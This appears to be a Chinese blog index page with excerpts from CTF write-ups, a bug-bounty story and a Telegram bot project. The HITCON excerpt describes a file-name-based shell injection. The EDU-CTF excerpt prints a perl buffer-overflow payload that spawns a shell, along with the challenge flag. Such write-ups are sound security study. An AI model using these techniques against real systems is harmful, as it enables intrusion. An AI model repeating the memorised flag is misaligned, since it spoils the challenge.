AIS3 EOF CTF 初賽

前言

這場比賽是跟台大、交大、台科大三校的計算機安全課程期末考一起辦的

然後任何人都可以報名參加

前十名的隊伍可以進決賽

Pwn

由於我們這隊基本上沒人熟Heap 囧

我也只摸了幾題課程網站的練習題

所以Pwn的解題狀況蠻慘的

Magicheap2這種一堆人解掉的題目,我們就解不出來

自己的Telegram BOT自己寫

img

前言

因為之前有在用別人寫的HITCON ZeroDay BOT

可是最近好像壞惹,都收不到通知

所以就想說,好吧,那就自己來寫一個吧!

開寫

首先,我想要的BOT功能是:

  • 每天同一時間,自己爬HITCON ZeroDay

  • 如果有新的Open漏洞,就傳通知給我

Line Bug Bounty初體驗

前言

最近開始嘗試打Bug Bounty和認真搞Web,沒時間碰Pwn惹QQ

有聽聞Line的bug bounty打得人少,但錢給蠻多的

所以理論上應該會比較好挖一點

雖然最後沒拿到錢啦QQ

不過有個Special Contributor

也挺潮的,值得紀念一下

HITCON CTF初賽

我來打醬油的
好像都沒貢獻到啥QQ

來記錄一下Web簡單題的解法
和幾題賽中有碰,但沒解出來的QQ

Baby First Revenge v1

這題和隊友討論很久才搞定QQ
其實一開始我們的方向就是正確的
比賽剛開始就在想,利用>ls之類的寫檔
再用ls>z,把產生的那些檔名塞到另一個檔案
最後串成指令去sh z

但後來發現ls會有順序問題,難搞定
思路就愈走愈偏了QQ

EDU-CTF 計算機安全

前言

這堂課是台大、台科大、交大、中央(?聯合的資安課程
今年全上pwn跟reverse,跟前年不太一樣(前年還有教Web、Crypto…等)
這一篇文章主要放這門課作業和練習的Write up,記錄一下解法怕忘記

課程網站:https://csie.ctf.tw

[hw0] Pwn 1

0x400566有個callme()
裡頭就是system("/bin/sh")
overflow蓋return address跳過去即可get shell
padding長度40

1
perl -e 'print "A"x40, "\x66\x05\x40\x00\x00\x00\x00\x00"'
1
FLAG{BuFFer_0V3Rflow_is_too_easy}